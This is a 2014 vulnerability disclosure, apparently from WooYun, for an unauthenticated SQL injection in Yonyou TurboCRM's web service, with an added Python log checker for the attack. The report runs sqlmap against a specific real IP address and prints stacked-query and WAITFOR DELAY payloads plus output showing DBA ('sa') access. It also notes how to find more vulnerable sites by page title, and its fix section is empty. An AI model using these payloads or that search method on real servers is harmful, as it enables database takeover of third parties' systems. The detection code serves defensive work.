Yonyou CRM injection vulnerability (no login required, affects all versions)

2014-10-03 13:25

Vulnerable URL:

http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1



Injection using sqlmap:

sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db  --is-dba



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: orgcode

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'--

---



current user: 'sa' 

current database: 'turbocrm70'

current user is DBA: True



Websites using this CRM were collected by their page title: 用友TurboCRM


Proof of vulnerability (sqlmap run and output as above):


Fix:

.....................
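The following Python log check is an added example, not part of the original report or of the vendor's code. It flags requests to /webservice/service.php whose orgcode parameter departs from an allowlist and names which traits of the two payload types in the sqlmap output it shows. The allowlist pattern, the combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: legitimate orgcode values are short alphanumeric codes.
ORGCODE_OK = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Signatures modelled on the two payload types in the sqlmap output above.
SIGNS = [
    ("stacked-query", re.compile(r";\s*\S")),
    ("time-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("quote-break", re.compile(r"'")),
    ("sql-comment", re.compile(r"--|/\*")),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation-range IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Oct/2014:13:20:01 +0800] "GET /webservice/service.php?class=WS_System&orgcode=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Oct/2014:13:21:44 +0800] "GET /webservice/service.php?class=WS_System&orgcode=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Oct/2014:13:21:50 +0800] "GET /webservice/service.php?class=WS_System&orgcode=1%27+WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1" 200 512',
]

def check_orgcode(value):
    """Reasons an orgcode value is suspicious; an empty list means clean."""
    if ORGCODE_OK.fullmatch(value):
        return []
    return [n for n, rx in SIGNS if rx.search(value)] or ["not-allowlisted"]

def scan_line(line):
    """Return (client_ip, reasons) for a suspicious request line, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/webservice/service.php"):
        return None
    reasons = []
    # Split on '&' only and decode each value, so %27 / + show up as ' / space.
    for pair in url.query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == "orgcode":
            for r in check_orgcode(unquote_plus(raw)):
                if r not in reasons:
                    reasons.append(r)
    return (line.split(" ", 1)[0], reasons) if reasons else None

def scan(lines):
    """Scan an iterable of log lines and return only the suspicious hits."""
    return [hit for hit in map(scan_line, lines) if hit]
```

Detection of this kind only narrows exposure; the root fix is to bind orgcode as a query parameter instead of concatenating it into SQL, and to stop connecting the application to the database as sa.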

Source: www.wooyun.org/bugs/wooyun-2014-067800
